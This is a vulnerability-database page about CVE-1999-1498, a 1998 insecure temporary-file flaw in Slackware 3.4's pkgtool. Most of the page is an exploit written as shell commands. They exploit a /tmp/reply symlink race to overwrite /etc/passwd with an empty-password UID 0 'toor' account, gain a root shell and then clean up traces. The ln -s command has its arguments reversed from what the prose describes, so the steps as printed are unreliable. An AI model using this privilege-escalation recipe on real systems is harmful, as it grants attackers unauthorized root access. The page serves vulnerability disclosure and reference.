Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-1999-1498

Publish Date: 06 Apr 1998

Author: neonhaze

                							

                source: http://www.securityfocus.com/bid/82/info

pkgtool creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file.
The file created has permissions -rw-rw-rw-.

$ cp /etc/passwd /tmp/passwd
$ ln -s /tmp/reply /etc/passwd
&lt; wait for root to run pkgtool &gt;
$ echo toor::0:0::/:/bin/sh &gt; /etc/passwd
$ su - toor
# cp /tmp/passwd /etc/passwd
# rm /tmp/reply /tmp/passwd

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Slackware Linux 3.4 - 'pkgtool' Temporary File

Vulmon Search

About

Products

Connect